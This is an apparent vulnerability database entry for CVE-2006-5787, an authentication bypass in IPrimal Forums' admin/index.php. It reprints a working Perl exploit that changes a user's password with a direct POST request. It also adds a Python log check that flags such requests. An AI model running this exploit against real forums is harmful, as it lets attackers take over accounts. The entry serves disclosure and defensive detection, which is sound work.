IPrimal Forums admin/index.php Authentication Bypass Vulnerability

Vulnerability ID: 1111474
Vulnerability type: Access validation error
Published: 2006-11-06
Updated: 2006-11-09
CVE ID: CVE-2006-5787
CNNVD-ID: CNNVD-200611-117
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/2731
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-117
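|Vulnerability details
An authentication bypass vulnerability exists in admin/index.php in IPrimalForums. A remote attacker can bypass authentication and change user passwords via a direct request, possibly related to an authentication issue in admin/chk_admin.php.
|Exploit (EXP)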
#!perl
#http://ipigroup.org/downloads/forums.zip
#Bl0od3r
#Germany
#shoutzz to all members of dC3 crew ,matrix_killer,eddie14
#special to str0ke
use IO::Socket;
if (@ARGV<4) {
&header;
} else { &start };

sub start() {
$host=$ARGV[0];
$path=$ARGV[1];
$user=$ARGV[2];
$passwd=$ARGV[3];
$post="usersname=".$user."&password=".$passwd."&email=test%40test.com&name=Dummy+user&tagline=Im+a+dumy+user&location=Ohio&bday=1983-11-20&job=Being+a+test+dummy&interests=Anything&bio=I%5C%5C%5C%27ve+been+sitting+on+this+db+my+whole+life.++HELP%21&signature=This+is+my+signature.&url=http%3A%2F%2Fipigroup.org&aim=myaim&yahoo=myyahoo&msn=mymsn%40hotmail.com&icq=546546&submitupdate=Update";
$len=length($post);
$sock=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80")
or die ("Error");
print $sock "POST ".$path."admin/index.php?p=members&edit=".$user." HTTP/1.0\n";
print $sock "Host: ".$host."\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-Length: ".$len."\n\n";
print $sock $post;

print "[+]Seems like your account has been created!Now try to login in :";
print "\n[+]User:$user\t[+]Password:$passwd";
}

sub header() {
print("
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\t\t~~iPrimal Forums Users(ChangePass) 3xPl0!t~~
\t\t[+]By Bl0od3r
\t\t[+]dC3 Crew
\t\t[+]Usage:script.pl owned.org /script/ admin yeesss
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
");
}

# milw0rm.com [2006-11-06]
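
For defenders, an added example (not part of the original entry or the PoC): a check over web server access logs for the request shape described above, a POST to admin/index.php?p=members&edit=<user>, arriving from an address outside a known administrator set. The Apache-style log format, the function name `find_member_edits` and the `admin_ips` allowlist are assumptions; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache common/combined log prefix: ip - user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_member_edits(lines, admin_ips=frozenset()):
    """Return POSTs to .../admin/index.php?p=members&edit=<user> from non-admin IPs."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        url = urlsplit(m["target"])
        # The forum may be installed under any prefix, so match on the path suffix.
        if not url.path.lower().endswith("/admin/index.php"):
            continue
        q = parse_qs(url.query, keep_blank_values=True)
        if q.get("p") != ["members"] or "edit" not in q:
            continue
        if m["ip"] in admin_ips:  # assumed allowlist of administrator addresses
            continue
        hits.append({"ip": m["ip"], "time": m["ts"],
                     "user": q["edit"][0], "status": int(m["status"])})
    return hits

# Constructed sample lines using documentation address ranges, not real traffic.
SAMPLE = [
    '198.51.100.7 - - [06/Nov/2006:10:01:02 +0000] '
    '"POST /forum/admin/index.php?p=members&edit=admin HTTP/1.0" 200 512',
    '192.0.2.10 - - [06/Nov/2006:10:05:00 +0000] '
    '"POST /forum/admin/index.php?p=members&edit=bob HTTP/1.1" 200 498',
    '198.51.100.7 - - [06/Nov/2006:10:06:10 +0000] '
    '"GET /forum/admin/index.php?p=members HTTP/1.0" 200 900',
    '203.0.113.5 - - [06/Nov/2006:10:07:30 +0000] '
    '"POST /forum/index.php?p=login HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in find_member_edits(SAMPLE, admin_ips={"192.0.2.10"}):
        print(hit)
```

A hit from outside the administrator set is a prompt to check whether the named account's password or profile changed at that time.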
|References

Source: BID
Name: 20951
Link: http://www.securityfocus.com/bid/20951
Source: MILW0RM
Name: 2731
Link: http://www.milw0rm.com/exploits/2731
Source: VUPEN
Name: ADV-2006-4383
Link: http://www.frsirt.com/english/advisories/2006/4383
Source: SECUNIA
Name: 22757
Link: http://secunia.com/advisories/22757
Source: XF
Name: iprimalforums-chkadmin-sql-injection(30073)
Link: http://xforce.iss.net/xforce/xfdb/30073
Source: MILW0RM
Name: 2731
Link: http://milw0rm.com/exploits/2731